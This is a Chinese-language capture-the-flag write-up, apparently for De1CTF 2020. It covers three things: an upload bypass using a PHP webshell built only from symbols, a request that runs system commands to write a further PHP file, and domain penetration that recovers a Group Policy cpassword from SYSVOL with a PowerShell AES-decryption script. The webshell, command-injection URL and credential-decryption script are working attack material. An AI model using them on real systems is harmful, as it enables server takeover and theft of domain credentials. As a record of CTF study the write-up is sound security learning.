无数字字母的webshell
上传绕过,只需用短标签、P神的无数字字母的webshell绕过即可,上传文件名绕过因为是windows直接大小写绕过。
exp
<?= $_=[] ?>
<?= $_=@"$_" ?>
<?= $_=$_[('!'=='@')] ?>
<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ = "_".$__ ?>
<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ .= $__ ?>
<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ .= $__ ?>
<?= ${$_______}["_"](${$_______}["__"]) ?>
写小马:
http://47.113.219.76/uploads/d8ffd2952b7416f6096c2481dfad4351/6539886cfe4730b929fa714a800aa44a_6.Php?_=system&__=echo "<?php phpinfo()?>">>1.php
域渗透
上传cmd.exe后执行net user看到提示在\\192.168.0.12\Hint
看到一个压缩包里面有flag1和flag2的提示。
SYSVOL还原组策略中保存的密码
参考3gstudent的-域渗透——利用SYSVOL还原组策略中保存的密码。
在域中,存在一个默认的共享路径:
\\<DOMAIN>\SYSVOL\<DOMAIN>\
这里的域可以在ipconfig /all下看到:
直接访问如下地址
//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/
找到对应的策略组id配置文件,如下的Group.xml
//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/Policies/{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}/Machine/Preferences/Groups/
简单的来说就是:\SYSVOL
路径中保存了域内用户的一些配置信息->找到HintZip_Pass
用户的配置信息->然后找到AES256加密的密钥,由于微软已经公开了私钥,那么就可以把这个登录密钥还原出来->最后解出压缩包。下面的cpasswd就是加密的秘钥
解密脚本
function Get-DecryptedCpassword {
[CmdletBinding()]
Param (
[string] $Cpassword
)
try {
#Append appropriate padding based on string length
$Mod = ($Cpassword.length % 4)
switch ($Mod) {
'1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
'2' {$Cpassword += ('=' * (4 - $Mod))}
'3' {$Cpassword += ('=' * (4 - $Mod))}
}
$Base64Decoded = [Convert]::FromBase64String($Cpassword)
#Create a new AES .NET Crypto Object
$AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
#Set IV to all nulls to prevent dynamic generation of IV value
$AesIV = New-Object Byte[]($AesObject.IV.Length)
$AesObject.IV = $AesIV
$AesObject.Key = $AesKey
$DecryptorObject = $AesObject.CreateDecryptor()
[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
}
catch {Write-Error $Error[0]}
}
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"
执行:
powershell -executionpolicy bypass -file 1.ps1
压缩包的密码是:zL1PpP@sSwO3d
得到flag: